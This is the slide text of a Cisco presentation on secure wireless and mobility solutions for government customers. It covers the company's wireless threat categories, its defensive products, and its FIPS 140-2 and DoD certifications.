1. 1 © 2006 Cisco Systems, Inc. All rights reserved.Cisco Public. Ransome 1208 Dr. Jim Ransome, CISSP, CISM Senior Director, Secure Unified Wireless and Mobility Solutions Corporate Security Programs Organization and Global Government Solutions Group Cisco Secure Unified Wireless and Mobility Solutions for Government

2. 2 © 2006 Cisco Systems, Inc. All rights reserved.Cisco Public  10+ years senior corporate executive information and physical security CSO Roles CISO Roles  23 years government service DOE/LLNL computer scientist/national security analyst, NCIS federal special agent, retired naval reserve intelligence officer, former marine corps sergeant  Ph.D. in information systems specializing in information security Dissertation: Developed/tested a converged wired-wireless network security model NSA/DHS Center of Academic Excellence in Information Assurance Education  Graduate Certificates International business and international affairs  Certifications Certified Information Security Professional (CISSP) Certified Information Security Manager (CISM)  Adjunct Professor for a masters-level information security curriculum  Publications (Elsevier - Digital Press) Operational Wireless Security, VoIP Security, IM Security, Business Continuity and Disaster Recovery for InfoSec Managers, Wireless Security: know it all About The Speaker

3. 3 © 2006 Cisco Systems, Inc. All rights reserved.Cisco Public  Can Wireless LANs Really Be Secured?  Building Secure Unified Wireless and Mobility Government Solutions  Cisco Wireless / Mobility Security Services Agenda

4. 4 © 2006 Cisco Systems, Inc. All rights reserved.Cisco Public Wireless Enables Mobility

5. 5 © 2006 Cisco Systems, Inc. All rights reserved.Cisco Public Wireless Enables Mobility

6. 6 © 2006 Cisco Systems, Inc. All rights reserved.Cisco Public Top 10 Tech Solutions Respondents Plan to Purchase Wireless / Mobility Security Data Quality Management COOP Enterprise Architecture IT Consolidation Email Management Service Oriented Architecture Virtualization IPv6 Transition Legacy Systems Integration Top 10 Tech Priorities Data Quality Management COOP Wireless / Mobility Security Email Management IT Consolidation Enterprise Architecture Legacy Systems Integration Service Oriented Architecture Virtualization IPv6 Transition Is there a Federal Market for Wireless and Mobility? * * Source: 1105 Government Information Group, May 2008, Custom Supplement to Federal Computer Week,

7. 7 © 2006 Cisco Systems, Inc. All rights reserved.Cisco Public Can Wireless LANs Really Be Secured?

8. 8 © 2006 Cisco Systems, Inc. All rights reserved.Cisco Public Cisco Wired Security Solution Portfolio Foundation Security Solutions Firewall Cisco ASA 5500 Intrusion Prevention Cisco IPS Remote Access VPN Cisco IPS Router Security Cisco ISR Family Switch Security Catalyst Engines Security Systems NAC / Clean Access Security Management Cisco VMS / MARS Endpoint Security Cisco Security Agent Converged Security Cisco ASA 5500 Application Security AVS, ACE Partner Access Corporate Network Internet Remote Access Remote/Branch Office Data Center Corporate LAN Web Servers / Web Services Partner Business Apps Public IM / Public IPC Secure WAN Secure PerimeterSecure Data Center Secure LAN Advanced Security Solutions Day Zero Application Security Security Management and Operations Network Admission Control

9. 9 © 2006 Cisco Systems, Inc. All rights reserved.Cisco Public Cisco Wireless Security: Collaboration with Cisco Wired Security Better protection through layered defense and network security collaboration  Mitigating Malware and Client Misbehavior Cisco (Wired) IPS  Enforcing Client Posture Cisco NAC  Controlling Client Connectivity Cisco Security Agent Cisco Secure Services Client  Unified Wired/Wireless Event and Mitigation Management Cisco Security MARS

10. 10 © 2006 Cisco Systems, Inc. All rights reserved.Cisco Public Cisco Unified Wired-Wireless Security Stop the Attack Before It Happens Denial of Service DENIAL OF SERVICE Service disruption Ad-hoc Wireless Bridge Client-to-client backdoor access HACKER Rogue Access Points Backdoor network access HACKER Evil Twin/Honeypot AP HACKER’S AP Connection to malicious AP Reconnaissance Seeking network vulnerabilities HACKER Cracking Tools Sniffing and eavesdropping HACKER On-Wire Attacks Over-the-Air Attacks Non-802.11 Attacks Backdoor access BLUETOOTH APRADARRF-JAMMERSBLUETOOTHMICROWAVE Service disruption Cisco Spectrum Intelligence Detects These Attacks Cisco wIPS Detects These Attacks

11. 11 © 2006 Cisco Systems, Inc. All rights reserved.Cisco Public Cisco Unified Wired-Wireless Security Stop the Attack Before It Happens On-Wire Attacks Denial of Service DENIAL OF SERVICE Service disruption Ad-hoc Wireless Bridge Client-to-client backdoor access HACKER Rogue Access Points Backdoor network access HACKER Evil Twin/Honeypot AP HACKER’S AP Connection to malicious AP Reconnaissance Seeking network vulnerabilities HACKER Cracking Tools Sniffing and eavesdropping HACKER Over-the-Air Attacks Non-802.11 Attacks Backdoor access BLUETOOTH APRADARRF-JAMMERSBLUETOOTHMICROWAVE Service disruption Cisco Spectrum Intelligence Detects These Attacks Cisco wIPS Detects These Attacks MFP neutralizes all management frame exploits, such as Man- in-the-Middle attacks WPA2/802.11i neutralizes recon and cracking attacks MFP makes wIPS rogue detection 100% accurate Strong AP device authentication eliminates rogues on wire

12. 12 © 2006 Cisco Systems, Inc. All rights reserved.Cisco Public NAC Appliance L2 IDS L3-7 IDS RF Containment 802.11a Rogue AP 802.11a Rogue Client Fine-grained Mapping and Authentication Location services enable precise mapping of clients and threats, allowing fine-grained authentication and quick removal Wired IDS Integration Unified wired and wireless IDS ensures malicious wireless clients are disconnected from the network Wireless Endpoint Compliance NAC prevents wireless endpoints from introducing viruses, spyware, malware, etc. Wireless IDS/IPS Comprehensive wireless threat identification and over-the-air prevention Offsite Endpoint Protection IPS detects and prevents offsite wireless threats such as ad hoc networks Building on 802.11i Cisco’s Unified Wireless Security Approach to End-to-End Security

13. 13 © 2006 Cisco Systems, Inc. All rights reserved.Cisco Public Enterprise user Guest user Switch-to- switch guest tunnel Enterprise Network DMZ Guest controller Wireless Security Policy Rogue AP Campus Contractor Guest Contractor Guest Contractor Network Segmentation Key to providing Guest Access by controlling and prioritizing access to business resources Wireless Network Location Services Quick Location of rogue access points and other wireless threats Guest Services Path Isolation/Guest traffic never mixes with enterprise traffic Wireless Security Policy Wireless client connection policy enforcement Building on 802.11i Other Key Elements of a Unified Wireless Security Solution

14. 14 © 2006 Cisco Systems, Inc. All rights reserved.Cisco Public Detect, classify, and locate RF interference Case Studies A Phased Approach Building on 802.11i Real-time RF Management and Integrated Spectrum Intelligence

15. 15 © 2006 Cisco Systems, Inc. All rights reserved.Cisco Public RF Spectrum Analysis Non-802.11 Devices RF Airspace Protection Wireless Intrusion Prevention Rogue Detection/Containment Wireless Hacking / Network and Signature Intrusion Detection Layer 1 Layer 2 Layers 2-7 Hardened Network Foundation Proactive Prevention Infrastructure Authentication Management Frame Protection Automated Vulnerability Analysis Wired-Side Security Collaboration Inappropriate Client Activity Malware Detection / Mitigation Admission Control Wired-Side Security Collaboration Inappropriate Client Activity Malware Detection / Mitigation Admission Control Cisco Unified Wired-Wireless Security Summary Comprehensive Layer 1-7 Protection and Prevention

16. 16 © 2006 Cisco Systems, Inc. All rights reserved.Cisco Public Cisco Wireless Federal Solution Cisco 2710 Wireless Location Appliance Cisco Wireless Control System (WCS) Centralized WLAN Management Cisco Aironet FIPS 140-2 APs Cisco Secure ACS FIPS 140-2 AAA RADIUS Cisco WLAN FIPS 140-2 Controllers WIDS FIPS & Common Criteria Certified Type-1 Certified

17. 17 © 2006 Cisco Systems, Inc. All rights reserved.Cisco Public FIPS 140-2 Certified End-to-End Mobile Applications DeviceAccess Control and Visibility Spectrum Intelligence Guest Access Mobility Services Location Security Voice Service and Performance FIPS WLCs  4402 – 12 APs  4402 – 25 APs  4402 – 50 APs  4404 – 100 APs  WiSM – 300 APs  3750G – 25 APs  3750G – 50 APs FIPS APs  1242  1131  1310  1232/31 In FIPS Process  1142 – 11n  1252 – 11n  1522 - Mesh FIPS Client  Secure Services Client (CSSC)  WPA2 / 802.11i  EAP-FAST, EAP- TLS, PEAP, WPA2-PSK FIPS-SSC FIPS ACS  Cisco Access Control Server  WPA2 / 802.11i  EAP-FAST, EAP- TLS, PEAP, WPA2- PSK Unified Wired and Wireless Network

18. 18 © 2006 Cisco Systems, Inc. All rights reserved.Cisco Public FIPS Certificate # 693 Cisco WLAN Controllers 4402-12; 4402-25; 4402-50 and 4404-100 FIPS Certificate # 695 Cisco Aironet (LWAPP) LAP1242, LAP1131, LAP1232, LAP1231 FIPS Certificate # 701 Cisco Aironet (IOS) AP1242, AP1131, AP1232 & BR1310 FIPS Certificate # 729 Cisco WiSM w/Catalyst 6506, 6506-E, 6509, 6509-E Switches FIPS Certificate # 948 Cisco Secure ACS FIPS Module FIPS Certificate # 955 Cisco WLAN Controllers 4402-12; 4402-25; 4402-50 and 4404-100 FIPS Certificate # 957 Cisco WiSM w/Catalyst 6506, 6506-E, 6509, 6509-E Switches FIPS Certificate # 958 Cisco Catalyst 3750G-25/50 WLAN Controller FIPS Certificate # 913 Cisco Aironet (LWAPP) LAP1242, LAP1131 FIPS Certificate #1016 Cisco Secure SSC FIPS Module In Process: Cisco Unified Wireless 5.2 FIPS Release + 15 Devices! More Than 20 Wireless Product FIPS 140-2

19. 19 © 2006 Cisco Systems, Inc. All rights reserved.Cisco Public Cisco Wireless DoD Certifications  Common Criteria - 10 wireless products in process Submitted with DoD approved NIAP lab for DoD WLAN Protection Profile conformance  U.S. Army IAAPL 5 products approved today; 10 more submitted in 2009  U.S. Navy NMCI ATO Cisco Wireless 802.11i end-to-end solution approved FIPS client, APs, Controllers, ACS, Location, etc  DoD 8100.2 WLAN Policy Compliance https://acc.dau.mil/CommunityBrowser.aspx?id=153484&lang=en-US  DISA Wireless STIG Compliance http://iase.disa.mil/stigs/stig/wireless_stig_v5r2.pdf Cisco Wireless DoD Approvals

20. 20 © 2006 Cisco Systems, Inc. All rights reserved.Cisco Public DoD compliant and FIPS validated  APs authenticate into DoD network with X.509 certs as CC trusted network devices  Controller/APs establish FIPS 140-2 validated assured control channel  APs enforce 802.1X port access control & terminate FIPS 140-2 encryption/decryption services at the edge of the DoD security border  Controller centrally manages 802.1x state machine providing secure mobility Type 1 Architecture for Wireless and Mobile Networks End-to-End Wireless Security

21. 21 © 2006 Cisco Systems, Inc. All rights reserved.Cisco Public Building Secure Unified Wireless and Mobility Government Solutions

22. 22 © 2006 Cisco Systems, Inc. All rights reserved.Cisco Public Challenges of a Secure and Interoperable Unified Communications Infrastructure